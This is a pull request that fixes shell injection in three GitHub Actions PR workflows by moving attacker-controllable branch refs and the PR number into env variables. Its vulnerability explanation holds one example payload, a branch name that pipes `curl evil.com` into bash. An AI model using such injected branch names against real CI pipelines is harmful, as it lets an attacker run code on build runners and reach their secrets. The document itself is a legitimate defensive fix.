### PR TITLE
RHAIENG-3914: fix GitHub Actions expression injection in PR workflows

### DIFF
--- a/.github/workflows/build-notebooks-pr-aipcc.yaml
+++ b/.github/workflows/build-notebooks-pr-aipcc.yaml
@@ -64,20 +64,24 @@ jobs:
           go-version: "stable"
           cache-dependency-path: "scripts/buildinputs/go.mod"
 
+      # RHAIENG-3914: use env vars to prevent GitHub Actions expression injection
       - name: Determine targets to build based on changed files
         if: ${{ github.event_name == 'pull_request_target' }}
         run: |
           set -x
-          git fetch --no-tags origin 'pull/${{ github.event.pull_request.number }}/head:${{ github.event.pull_request.head.ref }}'
-          git fetch --no-tags origin '+refs/heads/${{ github.event.pull_request.base.ref }}:refs/remotes/origin/${{ github.event.pull_request.base.ref }}'
+          git fetch --no-tags origin "pull/${PR_NUMBER}/head:${HEAD_REF}"
+          git fetch --no-tags origin "+refs/heads/${BASE_REF}:refs/remotes/origin/${BASE_REF}"
           python3 ci/cached-builds/gen_gha_matrix_jobs.py \
-            --from-ref 'origin/${{ github.event.pull_request.base.ref }}' \
-            --to-ref '${{ github.event.pull_request.head.ref }}' \
+            --from-ref "origin/${BASE_REF}" \
+            --to-ref "${HEAD_REF}" \
             --rhel-images exclude \
             --s390x-images include
         id: gen
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          HEAD_REF: ${{ github.event.pull_request.head.ref }}
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         shell: bash
 
   build:

--- a/.github/workflows/build-notebooks-pr-rhel.yaml
+++ b/.github/workflows/build-notebooks-pr-rhel.yaml
@@ -63,19 +63,23 @@ jobs:
           go-version: "stable"
           cache-dependency-path: "scripts/buildinputs/go.mod"
 
+      # RHAIENG-3914: use env vars to prevent GitHub Actions expression injection
       - name: Determine targets to build based on changed files
         if: ${{ github.event_name == 'pull_request_target' }}
         run: |
           set -x
-          git fetch --no-tags origin 'pull/${{ github.event.pull_request.number }}/head:${{ github.event.pull_request.head.ref }}'
-          git fetch --no-tags origin '+refs/heads/${{ github.event.pull_request.base.ref }}:refs/remotes/origin/${{ github.event.pull_request.base.ref }}'
+          git fetch --no-tags origin "pull/${PR_NUMBER}/head:${HEAD_REF}"
+          git fetch --no-tags origin "+refs/heads/${BASE_REF}:refs/remotes/origin/${BASE_REF}"
           python3 ci/cached-builds/gen_gha_matrix_jobs.py \
-            --from-ref 'origin/${{ github.event.pull_request.base.ref }}' \
-            --to-ref '${{ github.event.pull_request.head.ref }}' \
+            --from-ref "origin/${BASE_REF}" \
+            --to-ref "${HEAD_REF}" \
             --rhel-images include-only
         id: gen
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          HEAD_REF: ${{ github.event.pull_request.head.ref }}
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         shell: bash
 
   build:

--- a/.github/workflows/build-notebooks-pr.yaml
+++ b/.github/workflows/build-notebooks-pr.yaml
@@ -37,19 +37,23 @@ jobs:
           go-version: "stable"
           cache-dependency-path: "scripts/buildinputs/go.mod"
 
+      # RHAIENG-3914: use env vars to prevent GitHub Actions expression injection
       - name: Determine targets to build based on changed files
         run: |
           set -x
-          git fetch --no-tags origin 'pull/${{ github.event.pull_request.number }}/head:${{ github.event.pull_request.head.ref }}'
-          git fetch --no-tags origin '+refs/heads/${{ github.event.pull_request.base.ref }}:refs/remotes/origin/${{ github.event.pull_request.base.ref }}'
+          git fetch --no-tags origin "pull/${PR_NUMBER}/head:${HEAD_REF}"
+          git fetch --no-tags origin "+refs/heads/${BASE_REF}:refs/remotes/origin/${BASE_REF}"
           python3 ci/cached-builds/gen_gha_matrix_jobs.py \
-            --from-ref 'origin/${{ github.event.pull_request.base.ref }}' \
-            --to-ref '${{ github.event.pull_request.head.ref }}' \
+            --from-ref "origin/${BASE_REF}" \
+            --to-ref "${HEAD_REF}" \
             --rhel-images exclude \
             --s390x-images include
         id: gen
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          HEAD_REF: ${{ github.event.pull_request.head.ref }}
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         shell: bash
 
   build:


### PR DESCRIPTION
## Summary

- Fix context injection vulnerability in all three PR build workflows by moving attacker-controllable GitHub event values (`head.ref`, `base.ref`, `number`) from inline `${{ }}` expressions to `env:` variables
- Environment variables are not subject to GitHub Actions expression injection, preventing shell injection via crafted branch names

### Files changed
- `.github/workflows/build-notebooks-pr-aipcc.yaml` — `pull_request_target` workflow (critical)
- `.github/workflows/build-notebooks-pr-rhel.yaml` — `pull_request_target` workflow (critical)
- `.github/workflows/build-notebooks-pr.yaml` — `pull_request` workflow (defense in depth)

### What was the vulnerability?

A branch named `'; curl evil.com | bash; '` would be interpolated directly into shell commands via `${{ github.event.pull_request.head.ref }}`, allowing arbitrary command execution. The contributor allowlist gate mitigates this, but if a listed contributor's account were ever compromised, the injection would be directly exploitable.

Detected by mulliken/actions-scanner (PwnRequest vulnerability scanner).

JIRA: https://redhat.atlassian.net/browse/RHAIENG-3914

## Test plan

- [ ] Verify PR builds still trigger correctly on `opendatahub-io/notebooks`
- [ ] Verify PR builds still trigger correctly on `red-hat-data-services/notebooks`
- [ ] Confirm `git fetch` commands resolve refs correctly via env vars

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Chores**
  * Updated internal build process configuration to improve reliability and security.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->